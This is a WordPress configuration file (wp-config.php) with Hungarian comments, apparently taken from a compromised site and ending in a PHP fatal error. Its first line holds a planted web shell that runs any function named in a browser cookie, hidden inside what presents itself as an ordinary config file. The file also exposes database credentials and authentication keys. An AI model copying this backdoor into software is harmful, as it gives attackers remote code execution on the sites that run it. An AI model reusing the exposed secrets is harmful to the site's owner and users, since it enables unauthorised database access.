<%>PHP<% if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]); > /** * A WordPress fő konfigurációs állománya * * Ebben a fájlban a következő beállításokat lehet megtenni: MySQL beállítások * tábla előtagok, titkos kulcsok, a WordPress nyelve, és ABSPATH. * További információ a fájl lehetséges opcióiról angolul itt található: * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php} * A MySQL beállításokat a szolgáltatónktól kell kérni. * * Ebből a fájlból készül el a telepítési folyamat közben a wp-config.php * állomány. Nem kötelező a webes telepítés használata, elegendő átnevezni * "wp-config.php" névre, és kitölteni az értékeket. * * @package WordPress */ // ** MySQL beállítások - Ezeket a szolgálatótól lehet beszerezni ** // /** Adatbázis neve */ define('DB_NAME', 'barnalaszlo_zsm'); /** MySQL felhasználónév */ define('DB_USER', 'barnalaszlo_zsm'); /** MySQL jelszó. */ define('DB_PASSWORD', 'sV7X6sdXp'); /** MySQL kiszolgáló neve */ define('DB_HOST', 'localhost'); /** Az adatbázis karakter kódolása */ define('DB_CHARSET', 'utf8mb4'); /** Az adatbázis egybevetése */ define('DB_COLLATE', ''); /**#@+ * Bejelentkezést tikosító kulcsok * * Változtassuk meg a lenti konstansok értékét egy-egy tetszóleges mondatra. * Generálhatunk is ilyen kulcsokat a {@link http://api.wordpress.org/secret-key/1.1/ WordPress.org titkos kulcs szolgáltatásával} * Ezeknek a kulcsoknak a módosításával bármikor kiléptethető az összes bejelentkezett felhasználó az oldalról. * * @since 2.6.0 */ define('AUTH_KEY', 'PxX<.?Ebbs$5[>]p;Z/2$4rrie%5-bTgRCH~Rmuoc_}|q%%-[nvW_j~Nc-;Ucbat'); define('SECURE_AUTH_KEY', '! vt,gA+[I-VZ(]-v(n2QBCEcb _G`H%B^<920D|3}7]FawJ'); define('SECURE_AUTH_SALT', 'OA7YUkbScuUkb2TT-[^-kII+|MX||'); define('LOGGED_IN_SALT', 'DY0CY*[4}l-Ce[pxWcC08=TUaGM.787Jx5YhanY|'); define('NONCE_SALT', 'v4-:-I7b$gdIMJFxnHaF^x(GULm]>:!|b}th(Kai.YT5qqzNoq|^Her!OcHm5[=='); /**#@-*/ /** * WordPress-adatbázis tábla előtag. * * Több blogot is telepíthetünk egy adatbázisba, ha valamennyinek egyedi * előtagot adunk. Csak számokat, betűket és alulvonásokat adhatunk meg. */ $table_prefix = 'wp_zsm'; /** * Fejlesztőknek: WordPress hibakereső mód. * * Engedélyezzük ezt a megjegyzések megjelenítéséhez a fejlesztés során. * Erősen ajánlott, hogy a bővítmény- és sablonfejlesztők használják a WP_DEBUG * konstansot. */ define('WP_DEBUG', false); /* Ennyi volt, kellemes blogolást! */ /** A WordPress könyvtár abszolút elérési útja. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Betöltjük a WordPress változókat és szükséges fájlokat. */ require_once(ABSPATH . 'wp-settings.php');
Fatal error: Call to undefined function wp() in /home/barnalaszlo/domains/zsmkautosiskola.hu/public_html/wp-blog-header.php on line 14